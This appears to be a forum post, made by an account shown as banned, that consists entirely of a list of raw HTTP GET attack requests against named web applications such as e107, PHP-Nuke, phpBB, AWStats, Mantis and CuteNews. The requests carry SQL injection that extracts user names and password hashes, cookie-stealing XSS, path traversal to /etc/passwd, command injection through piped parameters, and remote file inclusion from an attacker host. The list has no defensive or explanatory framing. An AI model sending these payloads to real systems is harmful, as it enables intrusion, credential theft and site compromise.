|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
PHP код:
/eatme.idc HTTP/1.1
/eatme.ida HTTP/1.1
/eatme.pl HTTP/1.1
/eatme.idq HTTP/1.1
/eatme.idw HTTP/1.1
/PSUser/PSCOErrPage.htm HTTP/1.1
/log HTTP/1.1
/stats HTTP/1.1
/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/news.php?list.99/**/UNION/**/SELECT/**/null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* HTTP/1.1
GET <weburl>/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* HTTP/1.1
GET <weburl>/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
GET <weburl>/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
GET <weburl>/print.php?what=article&id=X%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201 HTTP/1.1
GET <weburl>/print.php?what=article&id=X/**/AND/**/1=0/**/UNION/**/SELECT/**/id,id,nick,pass,id,id,id,id,id/**/from/**/admins/**/LIMIT/**/1 HTTP/1.1
GET <weburl>/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini HTTP/1.1
GET <weburl>/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y HTTP/1.1
GET <weburl>/sysadmin/system/show.asp?show=<script>alert("oops")</script> HTTP/1.1
GET <weburl>/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script> HTTP/1.1
GET <weburl>/./cgi-bin/targetfile HTTP/1.1
GET <weburl>/admin/case/case.adminfaq.php/admin.php?op=FaqCatGo HTTP/1.1
GET <weburl>/admin/admin.php/index.php HTTP/1.1
GET <weburl>/admin/modules/blocks.php/admin.php HTTP/1.1
GET <weburl>/mail/mmex.php?Settings=http://msn.com HTTP/1.1
GET <weburl>/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&UPnP_Work=1&FactoryDefaults=0 HTTP/1.1
GET <weburl>/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1 HTTP/1.1
GET <weburl>/main.cgi?next_file=/etc/passwd HTTP/1.1
GET <weburl>/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] HTTP/1.1
GET <weburl>/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\..\..\..\mydocuments\private\passwords.txt HTTP/1.1
GET <weburl>/cit/@@file/../../../../etc/passwd HTTP/1.1
GET <weburl>/modules.php?name=Reviews&rop=postcomment&id='&title=a HTTP/1.1
GET <weburl>/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> HTTP/1.1
GET <weburl>/vpasp/shopdisplayproducts.asp?id=5&cat=<img%20src="javascript:alert('XSS')"> HTTP/1.1
GET <weburl>/main.cgi?next_file=poop<script>alert('scriptX :P');</script> HTTP/1.1
GET <weburl>/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script> HTTP/1.1
GET <weburl>/ssi.php?a=out&type=xml&f=<script>alert("ALOooooooooo");</script> HTTP/1.1
GET <weburl>/forum/registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2 7%29%3C%2Fscript%3E HTTP/1.1
GET <weburl>/registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2 7%29%3C%2Fscript%3E HTTP/1.1
GET <weburl>/chat/usersL.php3?L=russian&R='[SQL] HTTP/1.1
GET <weburl>/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/* HTTP/1.1
GET <weburl>/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOUHASHPASSWORD]&sheet=/../../../../../../etc/passwd%00 HTTP/1.1
GET <weburl>/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOUHASHPASSWORD]&sheet=1 HTTP/1.1
GET <weburl>/vpasp/shoperror.asp?msg=<img%20src="javascript:alert('XSS')"> HTTP/1.1
GET <weburl>//vpasp/shoperror.asp?msg=<meta%20http-equiv='refresh'content='0'> HTTP/1.1
GET <weburl>/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script> HTTP/1.1
GET <weburl>/?rawURL=<script>javascript:alert();</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=friend&jid=2&yun=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=friend&jid=2&ye=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=add&filelist[]=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=modify&filelist[]=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=delete&jid=<noscript>&forwhat=waraxe HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=comment&onwhat=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=commentsave&rid=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=commentkill&onwhat=1 HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=savenew&title=f00bar HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=search&bywhat=aid&exact=1%20&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.1
GET <weburl>/newsletter/admin.php?f=list_user&uname=test&ulevel=1 HTTP/1.1
GET <weburl>/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS');</script> HTTP/1.1
GET <weburl>/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho HTTP/1.1
GET <weburl>/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=& HTTP/1.1
GET <weburl>/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=& HTTP/1.1
GET <weburl>/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results HTTP/1.1
GET <weburl>/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results HTTP/1.1
GET <weburl>/modules.php?name=gallery&files=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=gallery&files=/../../../ HTTP/1.1
GET <weburl>/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\..\..\..\mydocuments\private\passwords.txt HTTP/1.1
GET <weburl>/chat.ghp?username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=&room=1&sex=0 HTTP/1.1
GET <weburl>/chat.ghp?username=FakeUser&password=&room=1&sex=0 HTTP/1.1
GET <weburl>/brightmail/quarantine/viewMsgDetails.do?id=QMsgView-[some-value] HTTP/1.1
GET <weburl>/?command=mkdir&filename=..// HTTP/1.1
GET <weburl>/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET <weburl>/jaws/index.php?gadget=2&action=<b>boldletter</b> HTTP/1.1
GET <weburl>/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET <weburl>/index.php?gadget=2&action=<b>boldletter</b> HTTP/1.1
GET <weburl>/_error?id=1&errormsg=<script>alert(document.cookie)</script> HTTP/1.1
GET <weburl>/forums/viewtopic.php?t=1&highlight=Bug,SELECT%20*%20FROM%20$table HTTP/1.1
GET <weburl>/%00 HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=english HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=<script>%20alert('XSS');</script>//<script>%20alert('XSS');</script> HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=<script>%20alert('XSS');</script>//<script>%20alert('XSS');</script>&LANGUAGE=lang//en HTTP/1.1
GET <weburl>/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/ HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../ HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=. HTTP/1.1
GET <weburl>/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert('hello');</script> HTTP/1.1
GET <weburl>/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);</script>&category_rows[0][cat_order]=99 HTTP/1.1
GET <weburl>/faq.php?faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe HTTP/1.1
GET <weburl>/faq.php?mode=bbcode&faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe HTTP/1.1
GET <weburl>/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors HTTP/1.1
GET <weburl>/cgi-bin/web_store.cgi?page=.html|cat%20/etc/passwd| HTTP/1.1
GET <weburl>/help.php?file=<script>alert('xss');</script> HTTP/1.1
GET <weburl>/artmedic-kleinanzeigen-path/index.php?id=http://www.example.com HTTP/1.1
GET <weburl>/index.php?id=http://www.example.com HTTP/1.1
GET <weburl>/modules.php?name=Search&sid=<script>alert('hi');</script> HTTP/1.1
GET <weburl>/modules.php?name=Search&query=*&max=<script>alert('hi');</script> HTTP/1.1
GET <weburl>/modules.php?name=Search&a=6&query=*&match=<script>alert('hi');</script> HTTP/1.1
GET <weburl>/modules.php?name=Search&type=stories&query=f00bar&category=-1%20&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/* HTTP/1.1
GET <weburl>/phpBB2/search.php?search_author='<script>alert(document.cookie)</script> HTTP/1.1
GET <weburl>/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=1&title=%253cscript>alert%2528document.cookie);%253c/script> HTTP/1.1
GET <weburl>/show_news.php?subaction=addcomment&name=UserName&comments=http://www.example.com&id=1078525267||1090074219|UserName|none|127.0.0.1|<script>alert("example");</script>|| HTTP/1.1
GET <weburl>/printview.php?t=1&order_sql=UNION%20SELECT%201%20,%20user_password%20,%201,%201,%201,%201,%201,%201,%201,%201,%201,%201%20FROM%20phpbb_users%20WHERE%20user_id%20=admin%20ORDER%20BY%20t.topic_id%20ASC HTTP/1.1
GET <weburl>/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1
GET <weburl>/cit/@@file/../../../../etc/passwd HTTP/1.1
GET <weburl>/asplib/MapPassword.asp?id=140&ps=0&Wrong=1 HTTP/1.1
GET <weburl>/ErrLog/mi3errors.log HTTP/1.1
GET <weburl>/MapFrame.asp?mapID=5&mapname=<noscript> HTTP/1.1
GET <weburl>/asplib/SignIn.asp HTTP/1.1
GET <weburl>/show_archives.php?archive=[code]&subaction=list-archive& HTTP/1.1
GET <weburl>/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1
GET <weburl>/stats/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1
GET <weburl>/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet%20127.0.0.1%2080 HTTP/1.1
GET <weburl>/stats/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet%20127.0.0.1%2080 HTTP/1.1
GET <weburl>/mantis/core/bug_api.php?t_core_dir=http://attackers.example.com/ HTTP/1.1
GET <weburl>/core/bug_api.php?t_core_dir=http://attackers.example.com/ HTTP/1.1
GET <weburl>/login_page.php?return=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl/signup.php?username=user&email=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/login_select_proj_page.php?ref=%22%3E<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/demo/out/out.ViewFolder.php?folderid=3%20or%201=1 HTTP/1.1
GET <weburl>/mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd HTTP/1.1
GET <weburl>/page.php?xPage=<SCRIPT>alert(document.cookie)</SCRIPT> HTTP/1.1
GET <weburl>/news/news.mdb HTTP/1.1
GET <weburl>/news.mdb HTTP/1.1
GET <weburl>/forum/ZixForum.mdb HTTP/1.1
GET <weburl>/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 HTTP/1.1
GET <weburl>/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/fusion/fusion_admin/db_backups/backup_2004-08-17_1845.sql HTTP/1.1
GET <weburl>/%2E%2E%5Csystem.log HTTP/1.1
GET <weburl>/%2E%2E\system.log HTTP/1.1
GET <weburl>/adminSection/index_next.asp?admin=SQLInjection&Pass=SQLInjection HTTP/1.1
GET <weburl>/adminSection/ChangePassword.asp?LoginId=(SQLInjection)%20OPass=(SQLInjection)%20NPass=(SQLInjection)%20CPass=(SQLInjection) HTTP/1.1
GET <weburl>/adminSection/index.asp?ShowMsg=<noscript> HTTP/1.1
GET <weburl>/adminSection/ChangePassword.asp?ShowMsg=<noscript> HTTP/1.1
GET <weburl>/adminSection/users_list.asp?ShowMsg=<noscript> HTTP/1.1
GET <weburl>/comersus_customerLoggedVerify.asp?redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html} HTTP/1.1
GET <weburl>/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script> HTTP/1.1
GET <weburl>/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font> HTTP/1.1
GET <weburl>/sitenews.cgi?update\?oldsubject=OLD_SUBJ&subject=NEW_SUBJ&name=ANY_NAME&issue=ISSUE&message=MESSAGE HTTP/1.1
GET <weburl>/render.UserLayoutRootNode.uP?uP_tparam=utf<noscript> HTTP/1.1
GET <weburl>/cp/render.UserLayoutRootNode.uP?uP_tparam=utf<noscript> HTTP/1.1
GET <weburl>/ShowCenter/SettingsBase.php?Skin=<noscript> HTTP/1.1
GET <weburl>/cgi-bin/nbmember.cgi?cmd=test HTTP/1.1
GET <weburl>/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword HTTP/1.1
|